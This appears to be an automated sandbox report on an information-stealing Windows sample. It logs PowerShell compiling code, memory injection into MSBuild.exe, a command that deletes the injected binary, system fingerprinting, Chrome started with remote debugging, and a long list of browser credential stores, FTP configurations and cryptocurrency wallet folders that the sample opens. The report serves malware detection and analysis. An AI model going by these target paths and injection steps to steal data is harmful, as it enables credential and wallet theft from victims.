Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 421000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 11A1008 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pgu3x4ye\pgu3x4ye.cmdline" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe "C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES238E.tmp" "c:\Users\user\AppData\Local\Temp\pgu3x4ye\CSCD87E146550AE4A5F825126D37CD9244E.TMP" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" & rd /s /q "C:\ProgramData\vs00z" & exit Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: GetKeyboardLayoutList,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree, 8_2_0040DE1C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.SqlXml\v4.0_4.0.0.0__b77a5c561934e089\System.Data.SqlXml.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 8_2_00417652 SetFilePointer,SetFilePointer,GetLocalTime,SystemTimeToFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z, 8_2_00417652
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 8_2_00414E31 EntryPoint,GetUserNameW,GetComputerNameW, 8_2_00414E31
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 8_2_0040DDBF GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA, 8_2_0040DDBF
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information

barindex
Source: Yara match File source: Process Memory Space: csc.exe PID: 6684, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: 8.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.s4xltbnq.rm5.exe.51df770.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000002.2301833999.00000000051DF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2648805770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: s4xltbnq.rm5.exe PID: 764, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\tmp\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\db\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\events\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\minidumps\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\saved-telemetry-pings\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\bookmarkbackups\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\temporary\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\security_state\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\to-be-removed\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\events\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionstore-backups\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\default\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Exodus\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Exodus\backups\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Binance\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\ Jump to behavior
Source: Yara match File source: 00000008.00000002.2651923120.0000000001482000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

barindex
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Source: Yara match File source: Process Memory Space: csc.exe PID: 6684, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: 8.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.s4xltbnq.rm5.exe.51df770.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000002.2301833999.00000000051DF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2648805770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: s4xltbnq.rm5.exe PID: 764, type: MEMORYSTR
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs